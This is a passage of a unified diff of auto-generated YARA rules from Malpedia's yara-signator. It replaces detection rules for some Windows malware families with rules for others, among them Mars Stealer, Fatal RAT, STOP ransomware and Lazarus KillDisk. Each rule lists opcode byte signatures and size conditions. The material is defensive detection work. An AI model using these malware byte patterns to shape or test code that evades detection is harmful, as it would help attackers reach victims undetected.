$sequence_9 = { ac 8bda c1e305 03c3 8bda } condition: - 7 of them and filesize <131072 + 7 of them and filesize <1106944 } -rule MALPEDIA_Win_Invisimole_Auto : FILE +rule MALPEDIA_Win_Mars_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ca18c738-4139-5525-aa28-1ccc54f29c64" + id = "d22235ef-5968-5e10-be47-3cfb22c5f1b3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.invisimole_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mars_stealer_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "c66d253d3c18c58309d81357b0c6a50ba445964c209a2fd7bab05aae7420f29c" + logic_hash = "b25b9578c7efb2902b746c00b6410a6cd2ad1c64e90ea264af3674a130d6b800" score = 75 quality = 75 tags = "FILE" @@ -186078,32 +188860,32 @@ rule MALPEDIA_Win_Invisimole_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 668945f0 8d863e020000 50 ffd7 33c9 668945f2 8d45f8 } - $sequence_1 = { 8d5590 52 50 e8???????? 83c40c 83f8ff 0f848df1ffff } - $sequence_2 = { 0fb65714 83c448 6a01 8d45ff 50 56 8855ff } - $sequence_3 = { 6a01 8d45ff 50 56 c645ff33 } - $sequence_4 = { 8bec 83ec4c 53 56 8bf0 57 8d45b4 } - $sequence_5 = { 47 83ff09 72d5 8b0d???????? 56 6a00 51 } - $sequence_6 = { 57 6860040000 33db 53 56 e8???????? a1???????? } - $sequence_7 = { 8b45fc 50 a1???????? 6a00 50 ffd7 8b4308 } - $sequence_8 = { 8b45f4 8a5dfb 50 ff15???????? 8ac3 5f } - $sequence_9 = { 53 e8???????? 8b75df 81fee6010000 0f8335050000 8a8746020000 0a4710 } + $sequence_0 = { 33049508674100 894508 8b4d0c 83c101 894d0c 8b550c } + $sequence_1 = { 8b5118 52 8b853cfbffff 8b4814 } + $sequence_2 = { 898564e6ffff 83bd64e6ffff00 0f8405030000 6a00 } + $sequence_3 = { a1???????? 50 8b4d08 51 e8???????? 83c410 6a04 } + $sequence_4 = { 8b5508 c1ea08 33148d08674100 895508 8b450c } + $sequence_5 = { 52 8d85e8feffff 50 68???????? 8b4df8 51 } + $sequence_6 = { 837df820 0f8d61030000 6804010000 8d8de8feffff 51 e8???????? } + $sequence_7 = { 2b4d08 c681407c410000 8b550c 8955f8 } + $sequence_8 = { 8b953cfbffff 8b4214 83c020 50 6a00 } + $sequence_9 = { 52 8b85fcfbffff 50 ff15???????? 89857cdeffff } condition: - 7 of them and filesize <139264 + 7 of them and filesize <219136 } -rule MALPEDIA_Win_Scranos_Auto : FILE +rule MALPEDIA_Win_Atmosphere_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "366bbb3b-fd76-5e48-ad2c-11dfe56c53aa" + id = "7ba90f14-d41a-58f9-948d-cf574aec7198" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.scranos_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.atmosphere_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "5a9a306a889eeb594e8f9ae05b85780def5b0ff2c4ea6f54823c4b6d5baa27b1" + logic_hash = "0264599b5475822be219779f2f93298a08919e3b2fbd551146e8b50c69fa19e9" score = 75 quality = 75 tags = "FILE" @@ -186117,32 +188899,32 @@ rule MALPEDIA_Win_Scranos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83c404 8b55cc 8d440201 8945cc ebb5 8b4de4 } - $sequence_1 = { 8b8e70010000 8d542430 52 8b966c010000 8d442438 50 8d86b0030000 } - $sequence_2 = { eb13 8b4608 8b4e04 8b16 50 51 52 } - $sequence_3 = { e8???????? 83c428 e9???????? 8b55ec 8b42e4 50 8b4df4 } - $sequence_4 = { e8???????? 83c40c 85c0 0f8515070000 8b54241c 52 56 } - $sequence_5 = { 89834c010000 7523 8b542410 52 8d442420 50 8d8bc8000000 } - $sequence_6 = { 8b4d24 e8???????? 8945a0 8b4da0 894d9c c745fc00000000 8d55ac } - $sequence_7 = { 8b55e8 8b849544ffffff 89448d8c 8b4de8 8b948d30ffffff 8b4248 8b4de8 } - $sequence_8 = { 8b6c2410 57 8b7d00 8b87840c0000 81c7680c0000 8d4f0c 8944240c } - $sequence_9 = { c645fc00 8d4dc8 e8???????? c745fcffffffff 8d4da8 e8???????? 8b4594 } + $sequence_0 = { 83ec14 56 8b7104 85f6 } + $sequence_1 = { 88460e 33c0 894612 894616 89461a 884e1e } + $sequence_2 = { e8???????? 8b4604 85c0 7504 33f6 eb08 } + $sequence_3 = { 8bcf ff5338 5f 5e } + $sequence_4 = { c645fc02 8bcc 8965e8 50 51 e8???????? } + $sequence_5 = { 8bce 8975e8 8806 ff15???????? } + $sequence_6 = { 8bc4 89642410 50 e8???????? } + $sequence_7 = { 8b7c240c 8bf1 57 ff15???????? 8b470c } + $sequence_8 = { 51 83ec10 8bc4 89642410 50 e8???????? } + $sequence_9 = { 8bcc 8965e8 50 51 } condition: - 7 of them and filesize <2859008 + 7 of them and filesize <360448 } -rule MALPEDIA_Win_Mongall_Auto : FILE +rule MALPEDIA_Win_Evilgrab_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "df02f29b-7e4c-5b43-ac4d-a0a6d3cf6ee1" + id = "92d56cb6-a40e-55a9-bb4b-7f3303d7e68c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mongall" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mongall_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.evilgrab_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "09c3cb724c571a18322afe8d7b1ace648402df7ba3a7200f8ca50d9538f078c7" + logic_hash = "89c0b96a8a59594e704b0e35c7d209399933043505a45ecc6b5a8cd70ad1865a" score = 75 quality = 75 tags = "FILE" @@ -186156,32 +188938,32 @@ rule MALPEDIA_Win_Mongall_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 8b400c 8b08 8b11 52 ff15???????? ba???????? } - $sequence_1 = { 85ff 747c 56 57 68???????? e8???????? 68???????? } - $sequence_2 = { f3a5 8bc8 8b8500d9ffff 83e103 43 } - $sequence_3 = { 59 8985a0fdffff 3bc1 0f87cb090000 ff2485e6574000 838de8fdffffff 89b594fdffff } - $sequence_4 = { 8bd8 83fbff 7448 68???????? e8???????? } - $sequence_5 = { e8???????? 8bfc 85ff 741d 8b8df4fdffff 56 } - $sequence_6 = { 56 8d45f0 33f6 50 8935???????? 8935???????? ff15???????? } - $sequence_7 = { 8b7df0 8bc7 5f 5e c60300 } - $sequence_8 = { 89b5e4fdffff 89b5e0fdffff 89b5c0fdffff 888deffdffff } - $sequence_9 = { 85f6 5e 741d 8d85f8feffff } + $sequence_0 = { 50 50 50 52 89442440 89442434 89442438 } + $sequence_1 = { 8dbdb8f5ffff f3a5 a4 b909000000 be???????? 8dbd5cf4ffff f3a5 } + $sequence_2 = { c3 8d45c4 50 6a03 68???????? 8b0e 81c1d2000000 } + $sequence_3 = { 8b9534aeffff 52 8bcb e8???????? 85c0 7531 6aa7 } + $sequence_4 = { 8b35???????? e9???????? 8b85c8adffff 898540a3ffff 50 e8???????? 8b85c0adffff } + $sequence_5 = { 6a00 85f6 6a00 7567 } + $sequence_6 = { 52 8b45d4 8b481c 51 e8???????? } + $sequence_7 = { 52 8b35???????? ffd6 d1e0 898565a4ffff } + $sequence_8 = { 52 68???????? 53 ffd5 83c410 6880000000 53 } + $sequence_9 = { 33c0 8dbdf0efffff f3ab c685f0efffffd0 668b5304 52 e8???????? } condition: - 7 of them and filesize <199680 + 7 of them and filesize <327680 } -rule MALPEDIA_Win_Kasperagent_Auto : FILE +rule MALPEDIA_Win_Stop_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "31bd379d-36ff-5056-a7b4-5cc60c9344f8" + id = "fe824146-93e4-5101-ac02-1276fa1eda55" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kasperagent_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stop_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "a97fb5a8dde23a8ff235ddb0c06e57b70ba205db49e4efcaa1ba693facbe4b47" + logic_hash = "d919a89d4ce45439e081288fd345725318b761c87669a03e35d3c6db03d1320c" score = 75 quality = 75 tags = "FILE" @@ -186195,32 +188977,32 @@ rule MALPEDIA_Win_Kasperagent_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 84c0 741e 8bd6 57 52 e8???????? } - $sequence_1 = { ffb4b5b4fdffff 8b95ccfdffff 8b8dd8fdffff e8???????? 59 3bc3 } - $sequence_2 = { 83c404 8bd8 83caff f00fc117 } - $sequence_3 = { 33c9 894c2430 894c2434 894c2438 894c243c 85c0 7463 } - $sequence_4 = { 8d742410 8d442408 c7470800000000 894c240c e8???????? 84c0 } - $sequence_5 = { 7cb4 8b4c2414 8b01 3b70f8 } - $sequence_6 = { 66390c78 7535 84db 7524 } - $sequence_7 = { 8b50f4 52 50 e8???????? 5d } - $sequence_8 = { 7419 8d642400 3bfa 7311 } - $sequence_9 = { 8d3451 33ff 3bce 7419 8d642400 3bfa } + $sequence_0 = { 6a00 8d45e0 50 ffd6 85c0 75e2 6a64 } + $sequence_1 = { ffd0 5d c3 8b0d???????? 33d2 85c9 } + $sequence_2 = { 57 6a00 8bd9 6a00 6a12 ff33 } + $sequence_3 = { 56 57 6a00 8bd9 6a00 6a12 } + $sequence_4 = { ff750c ff7508 ffd0 5d c3 8b0d???????? } + $sequence_5 = { ff15???????? 50 e8???????? c745fc00000000 } + $sequence_6 = { 75e2 6a64 ff15???????? ffd3 } + $sequence_7 = { 68???????? 6a00 6a00 ff15???????? 33c9 894604 85c0 } + $sequence_8 = { 6a00 ff15???????? 33c9 894604 } + $sequence_9 = { 6a00 ff15???????? 33c9 894604 85c0 5e 0f95c1 } condition: - 7 of them and filesize <1605632 + 7 of them and filesize <6029312 } -rule MALPEDIA_Win_Regretlocker_Auto : FILE +rule MALPEDIA_Win_Lazarus_Killdisk_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e84161b8-423e-557e-8de0-b1e67c3c2a4c" + id = "37962373-db6b-5a82-a667-796eaa294f65" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.regretlocker_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus_killdisk" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lazarus_killdisk_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "54bb2aadd5c37dd020832b423319961afea1e93662e9effb9e0b762d9355990d" + logic_hash = "f14584aa2cdb4f56b5df407c3c19c0436c1677938983b3e7a6f77f9ce3d89a22" score = 75 quality = 75 tags = "FILE" @@ -186234,32 +189016,32 @@ rule MALPEDIA_Win_Regretlocker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8945e0 3bd8 742a 83ec18 8bcc 53 } - $sequence_1 = { 8d8568ffffff 50 e8???????? 83ec10 c645fc04 8bcc 6a06 } - $sequence_2 = { e8???????? 6aff 8bcb e8???????? 8d8df4feffff e8???????? 8d8d78ffffff } - $sequence_3 = { 8d4510 50 8d8578fdffff 50 8d45ec 50 e8???????? } - $sequence_4 = { 2b45fc 6a18 59 99 f7f9 ff750c 6bc018 } - $sequence_5 = { 3bf0 59 59 0f95c0 5f 5e } - $sequence_6 = { 50 f2c3 55 8bec 8b4508 56 } - $sequence_7 = { 83ec18 8bcc 57 e8???????? e8???????? 83c418 8d4dbc } - $sequence_8 = { 50 57 ff15???????? 85c0 0f8529ffffff 57 ff15???????? } - $sequence_9 = { 64890d00000000 5b c9 c21800 8b411c 8b10 85d2 } + $sequence_0 = { 8b530c 8b4308 33c9 8d4402ff 0fa4c109 } + $sequence_1 = { e8???????? 83c40c 57 8d4c242c } + $sequence_2 = { 8bf0 83feff 740e 8bce e8???????? 56 } + $sequence_3 = { 6a00 6800000002 ffd3 8bf0 83feff 7409 6a00 } + $sequence_4 = { 7438 8d55f0 52 68???????? } + $sequence_5 = { 89842430020000 53 56 57 e8???????? 8b1d???????? 33ff } + $sequence_6 = { 68???????? 57 ff15???????? 8b45a2 8b4da6 8b55ae } + $sequence_7 = { 8d95c0fdffff c1e009 52 50 57 } + $sequence_8 = { 40 83c610 8985e4fdffff 83f804 } + $sequence_9 = { 8d5de8 8955ec 894df4 8945f0 e8???????? 807db600 } condition: - 7 of them and filesize <1021952 + 7 of them and filesize <209920 } -rule MALPEDIA_Win_Flagpro_Auto : FILE +rule MALPEDIA_Win_M0Yv_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a8700192-f3cd-586a-895f-7ccfc513b903" + id = "13583ad1-2b04-58e4-9f81-2e107221c7c3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flagpro_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.m0yv" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.m0yv_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "21ab8654968f01505a5a06c6c338da8446a910a647e36c5322e4febf20ea2d89" + logic_hash = "885921d8c153e05a9fb6cddfe964abb6a41c6e3fc24a745c88fdae391a38b5ef" score = 75 quality = 75 tags = "FILE" @@ -186273,32 +189055,32 @@ rule MALPEDIA_Win_Flagpro_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8c2480000000 e8???????? 56 c784249c45010001000000 e8???????? } - $sequence_1 = { 57 6a00 6a00 6aff 68???????? } - $sequence_2 = { ffd0 c684249400000002 8b442430 3bc3 7408 8b08 8b5108 } - $sequence_3 = { 56 57 85c0 740b b900030000 8bf3 } - $sequence_4 = { 8b442428 3bc3 749d eb93 8b442428 8d54243c 895c243c } - $sequence_5 = { ba10000000 8d6e04 395618 7221 8b4500 eb1e } - $sequence_6 = { 39ac24c8000000 7210 8b9424b4000000 52 e8???????? 83c404 899c24c8000000 } - $sequence_7 = { 33ed 55 68???????? 8d842488030000 50 ff15???????? 8db4243c010000 } - $sequence_8 = { 8bf0 83c408 3bf3 7571 57 } - $sequence_9 = { 68???????? 8d8424880c0000 6800040000 50 } + $sequence_0 = { 490faff8 4d89c3 4901ff 4c8b1424 490fafd2 48039424b8000000 4c89ef } + $sequence_1 = { 72e7 4889f9 4889da e8???????? 48c7474800000000 31c0 6690 } + $sequence_2 = { f6c201 0f84e3000000 4183fb66 775c 744e } + $sequence_3 = { 4889fa e8???????? 4889f9 4889fa e8???????? 4c89f1 } + $sequence_4 = { 29e8 488bac24a8000000 894500 895504 44895d08 } + $sequence_5 = { 490fafc6 4801c2 4889942440010000 4c89842488000000 4c89c0 480fafc1 } + $sequence_6 = { 4f037ce538 4c21df 4c31d7 4e03bce498000000 4831c1 4901ff 4c89c8 } + $sequence_7 = { 2b6a24 448901 44894904 44895108 4489590c 44897110 897114 } + $sequence_8 = { 4883ec28 e8???????? 4885c0 7409 488b4010 } + $sequence_9 = { c1e802 4122c2 41884041 8bc2 83e003 8a0481 498bc8 } condition: - 7 of them and filesize <1411072 + 7 of them and filesize <779264 } -rule MALPEDIA_Win_Mutabaha_Auto : FILE +rule MALPEDIA_Win_Fatal_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "04cdad38-c730-58bf-ac9f-7881643cfe37" + id = "ad01455e-ebcc-5d76-97a6-8783411925c1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mutabaha_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fatal_rat_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "21a56ac17d7181e1f264aab4aad9c0f8a40e021362f525e9ed7460f5330637ce" + logic_hash = "bf12fac2d058bbab9ea0f9b93b84c2577fb8a36680f2394444c1c24a4d7c12b7" score = 75 quality = 75 tags = "FILE" @@ -186312,32 +189094,32 @@ rule MALPEDIA_Win_Mutabaha_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 8d9518ffffff 8d8d68feffff e8???????? 8d8d48ffffff c645fc09 } - $sequence_1 = { 8b85dcfdffff 83f808 7213 40 8d8dc8fdffff 50 ffb5c8fdffff } - $sequence_2 = { c745b800000000 c645a800 c745c06cac4700 85c0 7409 50 e8???????? } - $sequence_3 = { 85d2 7424 8b7c2424 8d4f08 833900 740a 40 } - $sequence_4 = { 0fb7f8 eb43 83f803 7536 ff734c ff75d4 e8???????? } - $sequence_5 = { c745ec00000000 668945dc e8???????? 8d45dc c745fc05000000 50 8bce } - $sequence_6 = { e8???????? c7465400000000 8bc6 8b4df4 64890d00000000 59 5e } - $sequence_7 = { 8d8d84fdffff c78598fdffff07000000 c78594fdffff00000000 66898584fdffff e8???????? 57 ba???????? } - $sequence_8 = { 0103 115304 33c0 5f 5e 5b 8be5 } - $sequence_9 = { e9???????? 8d8d5cffffff e9???????? 8d4dbc e9???????? 8d4dd4 e9???????? } + $sequence_0 = { 807dff00 742f 8b4e10 56 034df4 68???????? } + $sequence_1 = { 55 8bec 8b4508 33d2 3bc2 7432 8b481c } + $sequence_2 = { 833d????????02 7513 68???????? 8d851cffffff 50 e8???????? 59 } + $sequence_3 = { c645bb46 c645bc6f c645bd72 c645be6d 885dbf ff15???????? } + $sequence_4 = { 8b7df8 899e90000000 80662d00 8bce e8???????? 8b8e90000000 8b4614 } + $sequence_5 = { 48 eb05 8b462c 2bc1 8945f0 8b4508 8b0485d0b40110 } + $sequence_6 = { c685e0fdffff2e c685e1fdffff65 c685e2fdffff78 c685e3fdffff65 889de4fdffff c645946b c6459573 } + $sequence_7 = { 8981a4af0600 5d c3 c3 c3 55 8bec } + $sequence_8 = { 33db a5 a5 53 8d8520feffff 6a2e 50 } + $sequence_9 = { ff15???????? 53 56 50 a3???????? ff15???????? 80a5ecfbffff00 } condition: - 7 of them and filesize <1220608 + 7 of them and filesize <344064 } -rule MALPEDIA_Win_Underminer_Ek_Auto : FILE +rule MALPEDIA_Win_Blackshades_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2ed43350-f854-5062-8561-cad10f7ea1be" + id = "be0044cc-ffdd-5ce8-9261-6f20deb49ec5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.underminer_ek" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.underminer_ek_auto.yar#L1-L176" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackshades_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "39ca462c5e03509c03f5a77251b93a3d7053742d5a8b5f784c7649f495781800" + logic_hash = "5be1fd8de19e4a88da957f4843427153e72a697b528878c27f4d0e3032429536" score = 75 quality = 75 tags = "FILE" @@ -186351,38 +189133,32 @@ rule MALPEDIA_Win_Underminer_Ek_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68d040fa7e 687853fa7e ff742418 ffd0 85c0 } - $sequence_1 = { 684c52fa7e 53 ff15???????? 8bf8 85ff 7476 } - $sequence_2 = { 1bc0 23c1 83c008 5d c3 8b04c5e48f4200 5d } - $sequence_3 = { 884d17 0f8482000000 f6451701 7445 8b4d10 } - $sequence_4 = { 68e452fa7e 53 e8???????? 68ef030000 8d4311 68d233fa7e 50 } - $sequence_5 = { 51 e8???????? 83c408 8b55dc c745f000000000 } - $sequence_6 = { 8b49fc 83c223 2bc1 83c0fc 83f81f 0f87b0130000 52 } - $sequence_7 = { f30f7e4110 660fd645f0 c7411000000000 c741140f000000 c60100 837df410 0f4345e0 } - $sequence_8 = { 8b4d0c c60102 ebe9 3cbf 770b } - $sequence_9 = { 0fb6d1 f604557aa3420001 740f 8b45f0 8b8094000000 } - $sequence_10 = { 8bdf 46 ff4d0c c1e010 0fbf16 03d8 8d841a00800000 } - $sequence_11 = { 8b34bd6cc64200 eb07 8b34bd38c64200 53 46 } - $sequence_12 = { 89451c 7548 803ee8 7559 8b4601 } - $sequence_13 = { 6a00 51 50 57 ff15???????? ff75d8 } - $sequence_14 = { 49 807dff00 8955ec 894df4 8b0485582c4300 } - $sequence_15 = { 5b c9 c3 ff742408 8b442408 ff10 c3 } + $sequence_0 = { ff9e0460ff34 6c 60 ff0a } + $sequence_1 = { 08fe f5 0200 0000 6c 70ff 9e } + $sequence_2 = { 70ff f30004eb f4 02eb fb cf } + $sequence_3 = { 351cff1e55 2c00 0d6c04ff1b c700fb301cc9 } + $sequence_4 = { 58 2f 60 ff6c74ff } + $sequence_5 = { 2a23 60 ff1b 0d002a460c fff5 0200 0000 } + $sequence_6 = { 6c ff4a71 70ff 00746c78 ff1b } + $sequence_7 = { 6c ff4a71 70ff 00746c78 ff1b 4a } + $sequence_8 = { ff6c48ff 6c 4c ff40fc } + $sequence_9 = { ff1b 0d002a460c fff5 0200 0000 6c } condition: - 7 of them and filesize <466944 + 7 of them and filesize <999424 } -rule MALPEDIA_Win_Lobshot_Auto : FILE +rule MALPEDIA_Win_Payloadbin_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5bc103fe-8569-5650-9cd3-425031e0ab5f" + id = "2565adb0-0fc6-53d7-a6d7-714ee1e92525" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lobshot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lobshot_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.payloadbin" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.payloadbin_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "b29ec78bd5106a9ad51352916c3857459a77fea2349f02317d142c1882771dfc" + logic_hash = "23ee48d932fb0666838e9fe4bd35ace2ae0b6a999ccab2645c6692a493a38f19" score = 75 quality = 75 tags = "FILE" @@ -186396,32 +189172,32 @@ rule MALPEDIA_Win_Lobshot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 895c2414 85f6 7410 6a02 56 ff15???????? 56 } - $sequence_1 = { 8b4508 8bd1 85c0 7409 c60200 42 } - $sequence_2 = { 728d ff742418 ff15???????? 8b74241c 43 83fb04 0f8e42ffffff } - $sequence_3 = { 85d2 7905 895e18 8bd3 57 6a2a } - $sequence_4 = { 0f8485000000 8b461c 85c0 747e 8b7804 83ff2a 740d } - $sequence_5 = { 0f42c8 33ff 894d08 47 8b4e6c 3bcf 771f } - $sequence_6 = { 8b55f8 33ff 85d2 7839 8b5dfc 0fb774bb02 85f6 } - $sequence_7 = { 8b4e08 8a86b1160000 88040a ff4614 0fb786b4160000 8386b4160000f3 } - $sequence_8 = { 53 ff15???????? 8b0d???????? 8b15???????? 2b15???????? 8d4102 83e902 } - $sequence_9 = { 895004 8b8348140000 99 2bc2 8bf0 d1fe } + $sequence_0 = { eb05 bb08000000 488b0d???????? 4c8bc7 33d2 ff15???????? 413bdf } + $sequence_1 = { 668930 41c0f1c1 0fb70f 488bd7 450ad1 4c8bce 66410fabca } + $sequence_2 = { e9???????? 6644893c4f 660fc9 488bcf e9???????? ff15???????? e9???????? } + $sequence_3 = { f5 4803d5 e9???????? e8???????? 83c340 66413bf2 8d433f } + $sequence_4 = { c18c2400000000bb 48f79c2400000000 0f87deb91400 488d642418 9d } + $sequence_5 = { 4433c1 664133ce 418b0c84 d2e8 23cd 66410fbcc1 660bc4 } + $sequence_6 = { e8???????? c0a4241000000074 6873173773 48818424080000009c149337 49b90d1dba73583cde39 e8???????? 0f8867890000 } + $sequence_7 = { 41f6c593 483bc7 e9???????? 0f8482020000 488d4330 488d4b08 e9???????? } + $sequence_8 = { 8505bfcdef86 fb beae9070fe 40ad 6f } + $sequence_9 = { 6681ac2418000000ff28 4881842408000000b8559f29 e8???????? 9c 4881842408000000157db449 66818424100000001054 50 } condition: - 7 of them and filesize <247808 + 7 of them and filesize <3761152 } -rule MALPEDIA_Win_Bedep_Auto : FILE +rule MALPEDIA_Win_Bredolab_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "38514c33-d67a-59ce-9042-a62977e3ef09" + id = "0b33903d-ad64-555d-936e-aab5345d2509" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bedep_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bredolab_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "f62533daae7175b045e5c4c81adb2d2dce588f3fcc3da789cd782a4e3103423f" + logic_hash = "adde67d05e7a2d047afa70901aa11c567b41ad799d4fe97c3d9648b79067c4f5" score = 75 quality = 75 tags = "FILE" @@ -186435,32 +189211,32 @@ rule MALPEDIA_Win_Bedep_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4dd4 c70020000000 c7400421020000 8bc6 881e c6460103 } - $sequence_1 = { 8b4608 e8???????? 85c0 7c19 6a20 8bc7 e8???????? } - $sequence_2 = { e8???????? 85c0 8945f4 7e3a 837df800 7463 8bcb } - $sequence_3 = { 33ff 89742418 8974241c 8b542418 56 ff742420 8d4c2430 } - $sequence_4 = { 7d09 56 e8???????? 59 eb05 8b450c 8930 } - $sequence_5 = { 397338 89442428 0f85bb000000 6a7c 8d8424a4000000 56 50 } - $sequence_6 = { 75e2 b001 5e c20400 55 8bec 83e4f8 } - $sequence_7 = { 56 90 e8???????? 832000 6a04 ff750c 33c9 } - $sequence_8 = { 8d4568 50 ff7570 90 e8???????? 894570 64a118000000 } - $sequence_9 = { ff751c 83cb02 ff7520 53 ff7514 50 8d45f4 } + $sequence_0 = { 8b4518 89442410 8b4514 8944240c c744240800000000 } + $sequence_1 = { baffe8a435 89d1 31d2 f7f1 81c200e1f505 89542408 c7442404???????? } + $sequence_2 = { 0f85e8000000 ba???????? 90 31c0 6690 8a8800500010 300c02 } + $sequence_3 = { 57 56 53 b86c140000 } + $sequence_4 = { f2ae f7d1 8d41ff 81c40c090000 } + $sequence_5 = { 8b8318120000 85c0 0f8e88000000 c783381200000c000000 } + $sequence_6 = { 0f85c5000000 8b9560feffff 8b02 3b45dc 7437 } + $sequence_7 = { 5e 5f c9 c3 8db526ffffff b910000000 } + $sequence_8 = { 8b8a1c120000 85c9 0f8ee7000000 31ff 31c0 8d9d20f7ffff 89b514f7ffff } + $sequence_9 = { 85c0 753b 0fb78394010000 338396010000 0d00000080 baffe8a435 89d1 } condition: - 7 of them and filesize <557056 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Murofet_Auto : FILE +rule 